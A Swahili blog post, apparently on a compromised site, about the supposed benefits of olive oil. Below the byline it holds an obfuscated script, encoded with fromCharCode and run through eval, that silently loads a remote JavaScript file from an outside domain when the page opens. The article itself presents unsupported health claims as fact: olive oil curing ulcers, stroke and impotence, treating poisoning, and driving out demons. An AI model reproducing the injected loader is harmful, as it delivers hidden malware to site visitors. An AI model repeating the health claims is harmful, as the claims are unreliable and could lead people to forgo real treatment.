Recent Comments

Zifaham Faida za Mzaituni na Mafuta yake

By ventas malack Jan 6, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Tunda la zaituni ni aghalabu sana kupatikana hasa katika eneo letu la Tanzania lakini lina faida nyingi sana kwa mwili wa binadamu na binadamu kwa ujumla na hii ni endapo tunda hili litatumika kwa ufanisi kabisa, ambapo huweza toa mafuta ambayo yana mchango mkubwa sana kwa binadamu.


Faida zake kwa binadamu
1: Husaidia kutibu maumivu ya tumbo ambapo mtu anatakiwa kunywa kijiko kimoja mara mbili kwa siku moja siku 7 hadi 11 atapona kabisa
2: Pia mafuta ya mzaituni huondoa mashetani kupitia dua fulani fulani hivi anayesumbuliwa atatakiwa kujipaka mwili mzima kwa siku mara moja pamoja na kutafuna vitunguu swaumu punje chache anapokwenda kulala zoezi lifanyike kwa siku arobaini usalama utapatikana.


3: Pia kinga dhidi ya mashetani, majini kwa kibinadamu kwa hasa unapojipaka mwili mzima mara moja kila siku.
4: Hutibu mafua ndani ya muda mfupi jipake kwenye mwamba wa pua na kwenye matundu ya pua mara tatu asubuhi, mchana na jioni. .
5: Pia hutibu vidonda vya tumbo tia vijiko 2 vya chakula katika uji halafu tumia mara mbili kwa siku ndani ya miezi mitatu utapona kabisa.
6: Pia mafuta ya mzaituni huweza kutoa huduma ya kwanza kwa mtu alokunywa sumu ambapo utamnyweshwa muda mfupi baada ya kunywa sumu.


7: Pia ni msaada kwa watu wenye ganzi mwilini pia wenye ugonjwa wa kiharusi tumia mafuta kujichua mwili asubuhi na jioni kila siku itamsaidia.
8: Pia hutumika kuua na kuondosha wadudu wabaya wanaokuwa tumboni hapa kunywa kijiko kimoja asubuhi na jioni ndani ya siku saba.
9: Mafuta haya pia hurejesha nguvu za kiume kwa wenye tatizo hilo, tumia kijiko kimoja kwa siku kunywa lakini pia changanya mafuta na vitunguu swaumu kisha chua uume fanya hivyo ndani ya siku saba hadi kumi na moja kuondosha fedheha na kulinda ndoa yako.
Hizo siyo faida za pekee za mafuta ya mzaituni bado zipo zingine kede wa kede, nakushauri tu tumia mafuta haya mara kwa mara ufurahie usalama wako kiafya na hata kiroho.
@Ventas Malack

By ventas malack

Make the World Aware